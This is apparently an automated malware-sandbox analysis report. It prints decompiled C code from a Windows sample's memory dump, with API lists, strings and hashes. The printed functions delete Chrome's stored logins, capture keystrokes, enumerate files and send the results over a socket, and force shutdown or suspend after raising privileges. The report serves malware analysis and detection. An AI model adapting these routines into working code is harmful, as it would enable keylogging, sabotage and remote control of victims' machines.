                              0x00441b13
                              0x00441b18
                              0x00441b19
                              0x00441b1b
                              0x00000000
                              0x00441b21
                              0x00441b25
                              0x00441b2a
                              0x00441b2b
                              0x00441b2d
                              0x00000000
                              0x00441b33
                              0x00441b39
                              0x00441b3e
                              0x00441b44
                              0x00441b4b
                              0x00441b51
                              0x00441b54
                              0x00441b5a
                              0x00441b61
                              0x00441b67
                              0x00441b6b
                              0x00441b71
                              0x00441b74
                              0x00441b7b
                              0x00441b80
                              0x00441b80
                              0x00441b82
                              0x00441b82
                              0x00441b85
                              0x00441b8c
                              0x00441ba4
                              0x00441ba4
                              0x00441ba7
                              0x00441b8e
                              0x00441b8e
                              0x00441b93
                              0x00441b95
                              0x00000000
                              0x00441b97
                              0x00441b99
                              0x00441b9f
                              0x00441b9f
                              0x00441b95
                              0x00441baf
                              0x00441bc3
                              0x00441bc9
                              0x00441bcb
                              0x00441bd9
                              0x00441bdb
                              0x00441bcd
                              0x00441bcd
                              0x00441bd0
                              0x00000000
                              0x00441bd2
                              0x00441bd4
                              0x00441bd4
                              0x00441bd0
                              0x00441bf0
                              0x00441bf7
                              0x00441bf9
                              0x00441c08
                              0x00441c0b
                              0x00441bfb
                              0x00441bfb
                              0x00441bfe
                              0x00000000
                              0x00441c00
                              0x00441c03
                              0x00441c03
                              0x00441bfe
                              0x00441bf9
                              0x00441c15
                              0x00441c1f
                              0x00441c24
                              0x00441c29
                              0x00441c30
                              0x00441c30
                              0x00441b2d
                              0x00441b1b
                              0x0044194c
                              0x0044194c
                              0x00441952
                              0x00441957
                              0x0044198d
                              0x0044198e
                              0x00441994
                              0x00441996
                              0x00441996
                              0x00441999
                              0x00441999
                              0x0044199b
                              0x0044199c
                              0x004419a2
                              0x004419ad
                              0x004419b2
                              0x004419b7
                              0x004419c1
                              0x00000000
                              0x004419c7
                              0x004419c7
                              0x004419c9
                              0x004419ca
                              0x004419ca
                              0x004419cd
                              0x004419cd
                              0x004419cf
                              0x004419d0
                              0x004419d7
                              0x004419dc
                              0x004419e1
                              0x004419e6
                              0x004419ee
                              0x004419ef
                              0x004419f5
                              0x004419fa
                              0x004419ff
                              0x00441a05
                              0x00441a0a
                              0x00441a0b
                              0x00441a0e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00441a0e
                              0x00441a13
                              0x00441a14
                              0x00441a19
                              0x00441a1b
                              0x00441a1b
                              0x00441a23
                              0x00441a29
                              0x00441a2c
                              0x00441a2c
                              0x00441a30
                              0x00000000
                              0x00000000
                              0x00441a3a
                              0x00441a3a
                              0x00441a3d
                              0x00441a40
                              0x00441a42
                              0x00441a50
                              0x00441a52
                              0x00441a5c
                              0x00441a5c
                              0x00441a5e
                              0x00441a60
                              0x00000000
                              0x00000000
                              0x00441a57
                              0x00441a59
                              0x00441a5b
                              0x00441a5b
                              0x00000000
                              0x00441a5b
                              0x00000000
                              0x00441a59
                              0x00441a62
                              0x00441a65
                              0x00441a67
                              0x00441a72
                              0x00441a74
                              0x00441a7e
                              0x00441a7e
                              0x00441a80
                              0x00441a82
                              0x00000000
                              0x00000000
                              0x00441a79
                              0x00441a7b
                              0x00441a7d
                              0x00441a7d
                              0x00000000
                              0x00441a7d
                              0x00000000
                              0x00441a7b
                              0x00441a7e
                              0x00441a65
                              0x00441a84
                              0x00441a84
                              0x00441a86
                              0x00441a8a
                              0x00441a8a
                              0x00441a8f
                              0x00441a91
                              0x00441a94
                              0x00441a97
                              0x00441a99
                              0x00441a9c
                              0x00441ab4
                              0x00441ab7
                              0x00441aba
                              0x00441ac2
                              0x00441ac7
                              0x00441acc
                              0x00000000
                              0x00441acc
                              0x00441a9e
                              0x00441aa3
                              0x00441aa6
                              0x00441aab
                              0x00441aae
                              0x00441ab0
                              0x00000000
                              0x00000000
                              0x00441ab2
                              0x004419ff
                              0x00000000
                              0x004419e6
                              0x00441959
                              0x00441959
                              0x0044195b
                              0x0044195d
                              0x0044195d
                              0x00441961
                              0x00000000
                              0x00000000
                              0x00441965
                              0x00441979
                              0x00441979
                              0x00441967
                              0x00441967
                              0x00441967
                              0x0044196d
                              0x00000000
                              0x0044196f
                              0x0044196f
                              0x00441972
                              0x00441977
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00441977
                              0x0044196d
                              0x00441982
                              0x00441984
                              0x00441ad3
                              0x00441ad3
                              0x0044198a
                              0x0044198a
                              0x00000000
                              0x0044198a
                              0x00000000
                              0x00441984
                              0x0044197d
                              0x0044197f
                              0x0044197f
                              0x00000000
                              0x0044197f
                              0x00441957
                              0x00000000

                              APIs
                              • _free.LIBCMT ref: 0044198E
                              • _free.LIBCMT ref: 004419B2
                              • _free.LIBCMT ref: 00441B39
                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045912C), ref: 00441B4B
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00441BC3
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00441BF0
                              • _free.LIBCMT ref: 00441D05
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$ByteCharMultiWide$InformationTimeZone
                              • String ID:
                              • API String ID: 314583886-0
                              • Opcode ID: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
                              • Instruction ID: 27a0a09a5c018c0c883660709ccb2a601b23158d2266427735da08219fe15e6e
                              • Opcode Fuzzy Hash: 122cb5b7360bd66e5ca6bc6a22e3fe7cd2d82cee20dbff4bc8e5ffd411c2e10e
                              • Instruction Fuzzy Hash: 68C14A71900249AFEB209F69DC41AAA7BB8EF85314F1441AFE481E7261EB388DC1C758
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040A291, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0040A291(void* __edi, void* __eflags) {
				char _v28;
				char _v52;
				void* __ebx;
				void* __ebp;
				long _t18;
				void* _t20;
				void* _t21;
				void* _t28;
				void* _t31;
				void* _t32;

				_t35 = __eflags;
				_t31 = __edi;
				_t30 = E00402064(_t20,  &_v52, E0043919A(_t20, __eflags, "UserProfile"));
				E0040530D(_t20,  &_v28, _t7, _t31, _t35, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
				L00401FA7();
				if(DeleteFileA(L00401F75( &_v28)) != 0) {
					_t28 = _t32 - 0x18;
					_push("\n[Chrome StoredLogins found, cleared!]");
					goto L6;
				} else {
					_t18 = GetLastError();
					if(_t18 == 0 || _t18 == 1) {
						_t28 = _t32 - 0x18;
						_push("\n[Chrome StoredLogins not found]");
						L6:
						E00402064(_t20, _t28);
						L0040AA8C(_t20, _t30, __eflags);
						_t21 = 1;
					} else {
						_t21 = 0;
					}
				}
				L00401FA7();
				return _t21;
			}













                              0x0040a291
                              0x0040a291
                              0x0040a2b1
                              0x0040a2b6
                              0x0040a2bf
                              0x0040a2d5
                              0x0040a2fb
                              0x0040a2fd
                              0x00000000
                              0x0040a2d7
                              0x0040a2de
                              0x0040a2e1
                              0x0040a2ef
                              0x0040a2f1
                              0x0040a302
                              0x0040a302
                              0x0040a307
                              0x0040a30c
                              0x0040a2e8
                              0x0040a2e8
                              0x0040a2e8
                              0x0040a2e1
                              0x0040a314
                              0x0040a31f

                              APIs
                              • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A2CD
                              • GetLastError.KERNEL32 ref: 0040A2D7
                              Strings
                              • UserProfile, xrefs: 0040A29D
                              • [Chrome StoredLogins not found], xrefs: 0040A2F1
                              • [Chrome StoredLogins found, cleared!], xrefs: 0040A2FD
                              • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A298
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: DeleteErrorFileLast
                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              • API String ID: 2018770650-1062637481
                              • Opcode ID: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
                              • Instruction ID: 3bbe084eb151dafee0128e30ec1122695afa5e51df6dfb55aa123115758e1eef
                              • Opcode Fuzzy Hash: 1f731214c167fda0d83f9a6878225b47f39a7a770fc5d80665c52e7481636777
                              • Instruction Fuzzy Hash: DE01F221A803095BCA04BAB5CD1B8AE7724A912305B50027FFC02732E2ED7E491986DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004132F7, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E004132F7() {
				void* _v8;
				intOrPtr _v12;
				struct _TOKEN_PRIVILEGES _v24;

				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
				_v24.PrivilegeCount = 1;
				_v12 = 2;
				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
				return GetLastError() & 0xffffff00 | _t16 != 0x00000000;
			}






                              0x0041330b
                              0x0041331d
                              0x00413329
                              0x00413335
                              0x0041333c
                              0x00413351

                              APIs
                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00413304
                              • OpenProcessToken.ADVAPI32(00000000), ref: 0041330B
                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0041331D
                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0041333C
                              • GetLastError.KERNEL32 ref: 00413342
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                              • String ID: SeShutdownPrivilege
                              • API String ID: 3534403312-3733053543
                              • Opcode ID: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction ID: 9f46d7e8cb4fae5eef3d6f74a49905a97f95598c6ea8fd14d39892eab67246b1
                              • Opcode Fuzzy Hash: e8fe39f6d22bf31b9f32ed8a783483683b9b4529cc27f430151640f81076cac5
                              • Instruction Fuzzy Hash: B7F03A71801229BBDB10AFA1ED0DEEFBF7CEF05A52F000060B905A2196D6348B14CAA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004077EE, Relevance: 9.3, APIs: 6, Instructions: 324fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 80%
                              			E004077EE(signed int __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t106;
				intOrPtr* _t111;
				signed int _t121;
				void* _t133;
				void* _t154;
				void* _t157;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t172;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				void* _t206;
				char* _t220;
				char* _t221;
				void* _t255;
				void* _t264;
				signed int _t267;
				void* _t273;
				void* _t279;
				void* _t281;
				intOrPtr _t282;
				void* _t283;
				void* _t284;
				void* _t287;

				_t255 = __edx;
				_t188 = __ecx;
				E00450918(0x451e92, _t279);
				_t282 = _t281 - 0x300;
				 *((intOrPtr*)(_t279 - 0x10)) = _t282;
				_t185 = _t188;
				 *(_t279 - 0x18) = _t185;
				E004020B5(_t185, _t279 - 0x9c);
				 *(_t279 - 0x1c) =  *(_t279 - 0x1c) | 0xffffffff;
				 *_t185 = 0;
				 *(_t279 - 4) =  *(_t279 - 4) & 0x00000000;
				_t186 = _t185 + 4;
				E00404955(_t186);
				_t283 = _t282 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t106 = E004049D2(_t255, _t264);
				_t289 = _t106;
				if(_t106 == 0) {
					_push(0);
					_push(0);
					goto L4;
				} else {
					_t283 = _t283 - 0x18;
					L00402F73(_t186, _t283, L00402F97(_t279 - 0x6c, _t279 + 0x38, 0x46c238), _t289, _t279 + 0x50);
					_push(0x64);
					_t186 = _t186 & 0xffffff00 | L00404A6E(_t186, _t186, _t179, _t289) == 0xffffffff;
					L00401FA7();
					_t291 = _t186;
					if(_t186 != 0) {
						L00404DD5( *(_t279 - 0x18) + 4);
						 *((intOrPtr*)(_t279 - 0x20)) = 1;
						_push(0x4685c0);
						_t157 = _t279 - 0x20;
						L3:
						_push(_t157);
						L4:
						E0043196A();
					}
				}
				_t266 = E004022EA(_t279 + 0x20, _t279 - 0x30);
				_t111 = E004022AD(_t279 + 0x20, _t279 - 0x34);
				E00408228(_t279 - 0x3c,  *((intOrPtr*)(E004022EA(_t279 + 0x20, _t279 - 0x38))),  *_t111,  *_t109);
				_t284 = _t283 + 0xc;
				_t256 = _t279 + 8;
				_t273 = FindFirstFileW(L00401ECB(E00407516(_t279 - 0x6c, _t279 + 8, _t291, "*")), _t279 - 0x304);
				 *(_t279 - 0x1c) = _t273;
				L00401ED0();
				_t291 = _t273 - 0xffffffff;
				if(_t273 != 0xffffffff) {
					goto L7;
				} else {
					_t283 = _t284 - 0x18;
					E00402064(_t186, _t283, 0x45f6ac);
					_push(0x65);
					L00404A6E(_t186,  *(_t279 - 0x18) + 4, _t256, _t291);
					L00404DD5( *(_t279 - 0x18) + 4);
					 *((intOrPtr*)(_t279 - 0x24)) = 2;
					_push(0x4685c0);
					_t157 = _t279 - 0x24;
					goto L3;
				}
				while(1) {
					L7:
					_t121 = FindNextFileW(_t273, _t279 - 0x304);
					__eflags = _t121;
					if(_t121 == 0) {
						break;
					}
					_t186 =  *(_t279 - 0x18);
					__eflags =  *_t186;
					if( *_t186 == 0) {
						__eflags =  *(_t279 - 0x304) & 0x00000010;
						if(( *(_t279 - 0x304) & 0x00000010) == 0) {
							L31:
							E0040425F(_t186, _t279 - 0x84, _t279 - 0x2d8);
							_t266 = E004022EA(_t279 - 0x84, _t279 - 0x3c);
							_t276 = E004022AD(_t279 - 0x84, _t279 - 0x38);
							E00408228(_t279 - 0x30,  *((intOrPtr*)(E004022EA(_t279 - 0x84, _t279 - 0x34))),  *_t139,  *_t137);
							_t284 = _t284 + 0xc;
							__eflags = E00408099(_t279 - 0x84, _t279 + 0x20, 0) - 0xffffffff;
							if(__eflags == 0) {
								L34:
								L00401ED0();
								_t273 =  *(_t279 - 0x1c);
								continue;
							} else {
								L00401FB1(_t279 - 0x9c, _t256, _t276, E0040208B(_t186, _t279 - 0x54, _t256, __eflags, _t279 - 0x304, 0x250));
								L00401FA7();
								_t284 = _t284 - 0x18;
								_t256 = L00402F73(_t186, _t279 - 0x54, L00416CF4(_t186, _t279 - 0xb4, _t279 + 8), __eflags, 0x46c238);
								L00402F73(_t186, _t284, _t152, __eflags, _t279 - 0x9c);
								_push(0x66);
								_t154 = L00404A6E(_t186, _t186 + 4, _t152, __eflags);
								__eflags = _t154 - 0xffffffff;
								_t186 = _t186 & 0xffffff00 | _t154 == 0xffffffff;
								L00401FA7();
								L00401FA7();
								__eflags = _t186;
								if(_t186 == 0) {
									goto L34;
								} else {
									 *((intOrPtr*)(_t279 - 0x2c)) = 4;
									_push(0x4685c0);
									_t157 = _t279 - 0x2c;
									goto L3;
								}
							}
						} else {
							_t220 = ".";
							_t158 = _t279 - 0x2d8;
							while(1) {
								_t256 =  *_t158;
								__eflags = _t256 -  *_t220;
								if(_t256 !=  *_t220) {
									break;
								}
								__eflags = _t256;
								if(_t256 == 0) {
									L17:
									_t159 = 0;
								} else {
									_t256 =  *((intOrPtr*)(_t158 + 2));
									_t43 =  &(_t220[2]); // 0x2e0000
									__eflags = _t256 -  *_t43;
									if(_t256 !=  *_t43) {
										break;
									} else {
										_t158 = _t158 + 4;
										_t220 =  &(_t220[4]);
										__eflags = _t256;
										if(_t256 != 0) {
											continue;
										} else {
											goto L17;
										}
									}
								}
								L19:
								__eflags = _t159;
								if(_t159 == 0) {
									goto L31;
								} else {
									_t221 = L"..";
									_t160 = _t279 - 0x2d8;
									while(1) {
										_t256 =  *_t160;
										__eflags = _t256 -  *_t221;
										if(_t256 !=  *_t221) {
											break;
										}
										__eflags = _t256;
										if(_t256 == 0) {
											L25:
											_t161 = 0;
										} else {
											_t256 =  *((intOrPtr*)(_t160 + 2));
											_t46 =  &(_t221[2]); // 0x2e
											__eflags = _t256 -  *_t46;
											if(_t256 !=  *_t46) {
												break;
											} else {
												_t160 = _t160 + 4;
												_t221 =  &(_t221[4]);
												__eflags = _t256;
												if(_t256 != 0) {
													continue;
												} else {
													goto L25;
												}
											}
										}
										L27:
										__eflags = _t161;
										if(__eflags == 0) {
											goto L31;
										} else {
											_t256 = E00408252(_t186, _t279 - 0xb4, _t279 + 8, __eflags, E0040425F(_t186, _t279 - 0x54, _t279 - 0x2d8));
											E00403086(_t186, _t279 - 0x6c, _t164, _t266, __eflags, "\\");
											L00401ED0();
											L00401ED0();
											_t287 = _t284 - 0x18;
											E00407352(_t186, _t287, _t164, __eflags, _t279 + 0x20);
											_t284 = _t287 - 0x18;
											E00407352(_t186, _t284, _t164, __eflags, _t279 - 0x6c);
											_t172 = L00407C57(_t186, _t164, __eflags);
											__eflags = _t172;
											if(_t172 != 0) {
												L00401ED0();
												goto L31;
											} else {
												 *((intOrPtr*)(_t279 - 0x28)) = 3;
												_push(0x4685c0);
												_t157 = _t279 - 0x28;
												goto L3;
											}
										}
										goto L37;
									}
									asm("sbb eax, eax");
									_t161 = _t160 | 0x00000001;
									__eflags = _t161;
									goto L27;
								}
								goto L37;
							}
							asm("sbb eax, eax");
							_t159 = _t158 | 0x00000001;
							__eflags = _t159;
							goto L19;
						}
						L37:
						L00401FA7();
						L00401ED0();
						L00401ED0();
						L00401FA7();
						_t133 = L00401FA7();
						 *[fs:0x0] =  *((intOrPtr*)(_t279 - 0xc));
						return _t133;
					} else {
						FindClose(_t273);
						_t206 = _t186 + 4;
					}
					L10:
					L00404DD5(_t206);
					goto L37;
				}
				 *(_t279 - 4) =  *(_t279 - 4) | 0xffffffff;
				FindClose(_t273);
				_t267 =  *(_t279 - 0x18);
				L00402F73(_t186, _t284 - 0x18, L00402F97(_t279 - 0x54, _t279 + 0x38, 0x46c238), __eflags, _t279 + 0x50);
				_push(0x67);
				L00404A6E(_t186, _t267 + 4, _t124, __eflags);
				L00401FA7();
				_t206 = _t267 + 4;
				goto L10;
			}

































                              0x004077ee
                              0x004077ee
                              0x004077f3
                              0x004077f8
                              0x00407801
                              0x00407804
                              0x00407806
                              0x0040780f
                              0x00407814
                              0x00407818
                              0x0040781b
                              0x0040781f
                              0x00407824
                              0x00407829
                              0x00407833
                              0x00407834
                              0x00407835
                              0x00407836
                              0x00407839
                              0x0040783e
                              0x00407840
                              0x00407bf2
                              0x00407bf4
                              0x00000000
                              0x00407846
                              0x00407846
                              0x00407864
                              0x0040786a
                              0x00407876
                              0x0040787c
                              0x00407881
                              0x00407883
                              0x0040788b
                              0x00407890
                              0x00407897
                              0x0040789c
                              0x0040789f
                              0x0040789f
                              0x004078a0
                              0x004078a0
                              0x004078a0
                              0x00407883
                              0x004078b1
                              0x004078ba
                              0x004078d6
                              0x004078db
                              0x004078ea
                              0x00407904
                              0x00407906
                              0x0040790c
                              0x00407911
                              0x00407914
                              0x00000000
                              0x00407916
                              0x00407916
                              0x00407920
                              0x00407925
                              0x0040792d
                              0x00407935
                              0x0040793a
                              0x00407941
                              0x00407946
                              0x00000000
                              0x00407946
                              0x0040794e
                              0x0040794e
                              0x00407956
                              0x0040795c
                              0x0040795e
                              0x00000000
                              0x00000000
                              0x00407964
                              0x00407967
                              0x0040796a
                              0x00407980
                              0x00407987
                              0x00407a8e
                              0x00407a9b
                              0x00407aaf
                              0x00407ac0
                              0x00407ada
                              0x00407adf
                              0x00407af3
                              0x00407af6
                              0x00407b93
                              0x00407b99
                              0x00407b9e
                              0x00000000
                              0x00407afc
                              0x00407b17
                              0x00407b1f
                              0x00407b24
                              0x00407b4e
                              0x00407b52
                              0x00407b58
                              0x00407b5d
                              0x00407b62
                              0x00407b65
                              0x00407b6b
                              0x00407b76
                              0x00407b7b
                              0x00407b7d
                              0x00000000
                              0x00407b7f
                              0x00407b7f
                              0x00407b86
                              0x00407b8b
                              0x00000000
                              0x00407b8b
                              0x00407b7d
                              0x0040798d
                              0x0040798d
                              0x00407992
                              0x00407998
                              0x00407998
                              0x0040799b
                              0x0040799e
                              0x00000000
                              0x00000000
                              0x004079a0
                              0x004079a3
                              0x004079ba
                              0x004079ba
                              0x004079a5
                              0x004079a5
                              0x004079a9
                              0x004079a9
                              0x004079ad
                              0x00000000
                              0x004079af
                              0x004079af
                              0x004079b2
                              0x004079b5
                              0x004079b8
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004079b8
                              0x004079ad
                              0x004079c3
                              0x004079c3
                              0x004079c5
                              0x00000000
                              0x004079cb
                              0x004079cb
                              0x004079d0
                              0x004079d6
                              0x004079d6
                              0x004079d9
                              0x004079dc
                              0x00000000
                              0x00000000
                              0x004079de
                              0x004079e1
                              0x004079f8
                              0x004079f8
                              0x004079e3
                              0x004079e3
                              0x004079e7
                              0x004079e7
                              0x004079eb
                              0x00000000
                              0x004079ed
                              0x004079ed
                              0x004079f0
                              0x004079f3
                              0x004079f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x004079f6
                              0x004079eb
                              0x00407a01
                              0x00407a01
                              0x00407a03
                              0x00000000
                              0x00407a09
                              0x00407a2d
                              0x00407a32
                              0x00407a3e
                              0x00407a46
                              0x00407a4b
                              0x00407a54
                              0x00407a59
                              0x00407a62
                              0x00407a69
                              0x00407a6e
                              0x00407a70
                              0x00407a89
                              0x00000000
                              0x00407a72
                              0x00407a72
                              0x00407a79
                              0x00407a7e
                              0x00000000
                              0x00407a7e
                              0x00407a70
                              0x00000000
                              0x00407a03
                              0x004079fc
                              0x004079fe
                              0x004079fe
                              0x00000000
                              0x004079fe
                              0x00000000
                              0x004079c5
                              0x004079be
                              0x004079c0
                              0x004079c0
                              0x00000000
                              0x004079c0
                              0x00407c19
                              0x00407c1f
                              0x00407c27
                              0x00407c2f
                              0x00407c37
                              0x00407c3f
                              0x00407c47
                              0x00407c54
                              0x0040796c
                              0x0040796d
                              0x00407973
                              0x00407973
                              0x00407976
                              0x00407976
                              0x00000000
                              0x00407976
                              0x00407ba6
                              0x00407bab
                              0x00407bb1
                              0x00407bd2
                              0x00407bd8
                              0x00407bdd
                              0x00407be5
                              0x00407bea
                              0x00000000

                              APIs
                              • __EH_prolog.LIBCMT ref: 004077F3
                                • Part of subcall function 004049D2: connect.WS2_32(?,0046DB88,00000010), ref: 004049ED
                                • Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004078A0
                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 004078FE
                              • FindNextFileW.KERNEL32(00000000,?), ref: 00407956
                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040796D
                                • Part of subcall function 00404DD5: closesocket.WS2_32(?), ref: 00404DDB
                              • FindClose.KERNEL32(00000000), ref: 00407BAB
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowclosesocketconnectsend
                              • String ID:
                              • API String ID: 2104358809-0
                              • Opcode ID: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
                              • Instruction ID: 500d6ffaf10c8ca55e64fcd7a92a986a0ae94d1cc1e451eb4534f92e48179c39
                              • Opcode Fuzzy Hash: 55f9d0b4d494d3187606befb6d5192927cc31bf6f7193ab56803296ca8eb5cf2
                              • Instruction Fuzzy Hash: 78C16E719001099ADB14FB61CD52AEE7375AF10318F50427FE906B71E2EF38AB48CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004089BC, Relevance: 9.1, APIs: 6, Instructions: 54keyboardthreadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E004089BC(void* __ecx, intOrPtr _a4) {
				long _v8;
				void _v38;
				short _v40;
				char _v296;
				void* __ebx;
				void* __edi;
				struct HKL__* _t20;
				void* _t30;
				signed int _t32;
				void* _t36;

				_t30 = __ecx;
				E00431810(_t36,  &_v296, 0, 0x100);
				_v40 = 0;
				_t32 = 7;
				memset( &_v38, 0, _t32 << 2);
				asm("stosw");
				_t20 = GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(),  &_v8));
				GetKeyState(0x10);
				GetKeyboardState( &_v296);
				ToUnicodeEx( *(_t30 + 0x4c),  *(_t30 + 0x50),  &_v296,  &_v40, 0x10, 0, _t20);
				E0040425F(_t30, _a4,  &_v40);
				return _a4;
			}













                              0x004089d3
                              0x004089d8
                              0x004089e5
                              0x004089eb
                              0x004089ec
                              0x004089ee
                              0x00408a02
                              0x00408a0c
                              0x00408a19
                              0x00408a35
                              0x00408a42
                              0x00408a50

                              APIs
                              • GetForegroundWindow.USER32(00000000,?,00000000), ref: 004089F0
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 004089FB
                              • GetKeyboardLayout.USER32(00000000), ref: 00408A02
                              • GetKeyState.USER32 ref: 00408A0C
                              • GetKeyboardState.USER32(?), ref: 00408A19
                              • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A35
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                              • String ID:
                              • API String ID: 3566172867-0
                              • Opcode ID: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
                              • Instruction ID: ab76f315eabbce1fdb121dfd98bae8f760d40ea8c637dec96147df679fa50a93
                              • Opcode Fuzzy Hash: b02ccbf7f0dc03c4f6c19e4d88d394f0c81c31efefca9dfcc189d7371c4d50d7
                              • Instruction Fuzzy Hash: 6B110072900208BBDB109FE4DD49FDA77ACEB4C746F100465FA04E6191EA75AA54CBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00412598, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                              Download Yara Rule
                              C-Code - Quality: 62%
                              			E00412598(void* __edx, void* __ebp, void* __eflags, char _a12, char _a16, void* _a128, void* _a152) {
				void* _t12;
				int _t14;
				int _t20;
				int _t22;
				int _t31;
				intOrPtr* _t64;
				void* _t69;

				_t69 = __eflags;
				E004132F7();
				L00401E29( &_a16, __edx, _t69, 0);
				_t12 = L00405A22("0");
				_push(0);
				_t70 = _t12;
				if(_t12 == 0) {
					L00401E29( &_a12, "0", __eflags);
					_t14 = L00405A22("1");
					_push(0);
					__eflags = _t14;
					if(__eflags == 0) {
						L00401E29( &_a12, "1", __eflags);
						__eflags = L00405A22("2");
						if(__eflags == 0) {
							_t64 = GetProcAddress(LoadLibraryA("PowrProf.dll"), "SetSuspendState");
							L00401E29( &_a16, "2", __eflags, 0);
							_t62 = "3";
							_t20 = L00405A22("3");
							_push(0);
							__eflags = _t20;
							if(__eflags == 0) {
								L00401E29( &_a16, "3", __eflags);
								_t62 = "4";
								_t22 = L00405A22("4");
								__eflags = _t22;
								if(_t22 != 0) {
									_push(0);
									_push(0);
									_push(1);
									goto L11;
								}
							} else {
								_push(0);
								_push(0);
								L11:
								 *_t64();
							}
						} else {
							_push(0);
							_t31 = E00436079(_t28, L00401F75(L00401E29( &_a16, "2", __eflags, 1))) | 0x00000002;
							__eflags = _t31;
							goto L6;
						}
					} else {
						_t31 = E00436079(_t33, L00401F75(L00401E29( &_a12, "1", __eflags, 1))) | 0x00000001;
						goto L6;
					}
				} else {
					_t31 = E00436079(_t36, L00401F75(L00401E29( &_a12, "0", _t70, 1)));
					L6:
					ExitWindowsEx(_t31, ??);
				}
				L00401E54( &_a16, _t62);
				L00401FA7();
				L00401FA7();
				return 0;
			}










                              0x00412598
                              0x00412598
                              0x004125a4
                              0x004125b0
                              0x004125b9
                              0x004125ba
                              0x004125bc
                              0x004125d4
                              0x004125e0
                              0x004125e9
                              0x004125ea
                              0x004125ec
                              0x00412607
                              0x00412618
                              0x0041261a
                              0x00412661
                              0x00412663
                              0x00412668
                              0x0041266f
                              0x00412674
                              0x00412675
                              0x00412677
                              0x00412681
                              0x00412686
                              0x0041268d
                              0x00412692
                              0x00412694
                              0x0041269a
                              0x0041269b
                              0x0041269c
                              0x00000000
                              0x0041269c
                              0x00412679
                              0x00412679
                              0x0041267a
                              0x0041269e
                              0x0041269e
                              0x0041269e
                              0x0041261c
                              0x0041261c
                              0x00412635
                              0x00412635
                              0x00000000
                              0x00412635
